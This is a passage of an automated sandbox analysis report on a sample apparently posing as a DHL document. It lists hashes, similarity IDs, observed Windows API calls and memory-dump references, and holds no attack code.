                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      • Opcode ID: c330ed73c8e05f275dfda69ecab1f03779efe685a907c1ef4d1fb90b5ac694a7
                                                                                      • Instruction ID: 2264cb500823642d04c6d678edd1d1dec68beb36cc77584c6d2efb5a82d3d29a
                                                                                      • Opcode Fuzzy Hash: c330ed73c8e05f275dfda69ecab1f03779efe685a907c1ef4d1fb90b5ac694a7
                                                                                      • Instruction Fuzzy Hash: 06D0C936394314BBE664A771AC0FFC67A549B50B10F1059167645BA1E0C9A0A8458B54
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00DDBE93
                                                                                      • GetLastError.KERNEL32 ref: 00DDBEA1
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DDBEFC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1717984340-0
                                                                                      • Opcode ID: a933217ca1b0807ebeb64e4eb4beb859a6c38dda6271b6ee4b22c4b5e4f24753
                                                                                      • Instruction ID: 682e038483d47af8eed65700a5eb1968f0e7cff3bbf39ec3aa8815baa017e80e
                                                                                      • Opcode Fuzzy Hash: a933217ca1b0807ebeb64e4eb4beb859a6c38dda6271b6ee4b22c4b5e4f24753
                                                                                      • Instruction Fuzzy Hash: 9141B035605246EFCB218FB5CC44AAABBA5EF41334F2A416BF959973A1DB318C00DB70